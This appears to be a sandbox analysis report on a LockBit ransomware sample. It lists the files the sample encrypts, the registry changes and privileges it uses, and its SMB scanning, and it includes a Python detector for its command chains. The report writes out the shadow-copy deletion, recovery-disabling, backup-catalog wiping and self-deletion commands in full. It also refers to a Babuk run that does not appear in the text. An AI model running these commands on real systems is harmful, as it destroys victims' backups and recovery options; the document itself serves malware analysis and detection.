File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\is.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105526.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195260.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR34F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14883_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Traditional.dotx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\js\library.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files\Windows Photo Viewer\fr-FR\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\es-ES\sbdrop.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\background.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Elegant.dotx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\fsutil.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 (SeIncreaseWorkingSetPrivilege; LUID not resolved to a name by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 (SeTimeZonePrivilege; LUID not resolved to a name by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 (SeCreateSymbolicLinkPrivilege; LUID not resolved to a name by the sandbox) N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 1984 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 1984 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 1984 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 2548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1616 wrote to memory of 2548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1616 wrote to memory of 2548 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1616 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1616 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1616 wrote to memory of 3048 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1616 wrote to memory of 1004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 1004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 1004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1616 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1616 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1616 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 1984 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\mshta.exe
PID 1984 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1984 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1984 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 1984 wrote to memory of 2096 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2096 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2096 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2096 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 2096 wrote to memory of 2516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
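The two cmd.exe chains above are the whole recovery-inhibition and cleanup logic of this LockBit build: one chain deletes shadow copies (vssadmin, wmic), disables Windows boot recovery (bcdedit) and wipes the backup catalog (wbadmin); the other delays with ping to loopback, zeroes the first 512 KB of the dropper with fsutil setZeroData and then deletes it. The detector below is an added example written for this report, not sandbox code: it splits a process command line into its cmd.exe sub-commands, matches each recovery-inhibiting sub-command individually (so a chain that runs only some of them still fires), and flags the self-delete pattern only when the ping-then-wipe chain targets the parent process's own image. The process records are constructed from the command lines in this report plus one benign control (`vssadmin list shadows`); PIDs, parent PIDs and the record field names are assumptions.

```python
"""Detection for the recovery-inhibition and self-deletion command chains in this
report. Added example; not part of the sandbox output."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    details: tuple[str, ...]


# Sub-command patterns, matched against lower-cased text (MITRE T1490 Inhibit System Recovery).
RECOVERY_PATTERNS = {
    "vssadmin_delete_shadows": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    "wmic_shadowcopy_delete": re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b"),
    "bcdedit_ignore_boot_failures": re.compile(
        r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b"),
    "bcdedit_recovery_disabled": re.compile(
        r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b"),
    "wbadmin_delete_catalog": re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b"),
}
# Self-delete chain: a loopback ping as a sleep, then fsutil setZeroData and/or del /f.
PING_LOOPBACK = re.compile(r"\bping(\.exe)?\s+127\.\d+\.\d+\.\d+\b")
WIPE_OR_DELETE = re.compile(r"\b(fsutil(\.exe)?\s+file\s+setzerodata|del\s+/f)\b")

# Constructed process-creation records (fields, PIDs and PPIDs are assumptions);
# the command lines are the ones reported above, plus a benign control.
LOCKBIT = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
SAMPLE_EVENTS = [
    {"pid": 1984, "ppid": 1000, "image": LOCKBIT, "cmdline": f'"{LOCKBIT}"'},
    {"pid": 1616, "ppid": 1984, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete'
                r' & bcdedit /set {default} bootstatuspolicy ignoreallfailures'
                r' & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'},
    {"pid": 2096, "ppid": 1984, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul'
                f' & fsutil file setZeroData offset=0 length=524288 "{LOCKBIT}" & Del /f /q "{LOCKBIT}"'},
    {"pid": 3300, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c vssadmin list shadows'},   # benign control
]


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe command line into its chained sub-commands (&, &&, |, ||)."""
    return [p.strip() for p in re.split(r"&&|\|\||&|\|", cmdline) if p.strip()]


def self_delete_target(event: dict, parts: list[str], by_pid: dict[int, dict]) -> str | None:
    """Return the parent's image path when this chain sleeps via loopback ping and then
    zeroes or deletes that very executable; None otherwise."""
    parent = by_pid.get(event["ppid"])
    if parent is None:
        return None
    parent_image = parent["image"].lower()
    lowered = [p.lower() for p in parts]
    delayed = any(PING_LOOPBACK.search(p) for p in lowered)
    wipes = [p for p in lowered if WIPE_OR_DELETE.search(p) and parent_image in p]
    return parent["image"] if delayed and wipes else None


def analyse(events: list[dict]) -> list[Finding]:
    """Run both rules over process-creation records; one Finding per rule per process."""
    by_pid = {e["pid"]: e for e in events}
    findings: list[Finding] = []
    for e in events:
        parts = split_chain(e["cmdline"])
        hits = sorted(name for name, rx in RECOVERY_PATTERNS.items()
                      if any(rx.search(p.lower()) for p in parts))
        if hits:
            findings.append(Finding(e["pid"], "inhibit_system_recovery", tuple(hits)))
        target = self_delete_target(e, parts, by_pid)
        if target:
            findings.append(Finding(e["pid"], "self_delete_via_cmd", (target,)))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"PID {f.pid}: {f.rule} -> {', '.join(f.details)}")
```

Matching per sub-command rather than on the whole line is deliberate: the Babuk run later in this report issues `vssadmin.exe delete shadows /all /quiet` on its own, and the same rule catches it. The self-delete rule needs the parent's image path, so it only works on a telemetry source that records parent process information (Sysmon Event ID 1, Security 4688 with the creator process field enabled).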

Network

Country Destination Domain Proto
N/A 10.127.0.212:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.232:445 tcp
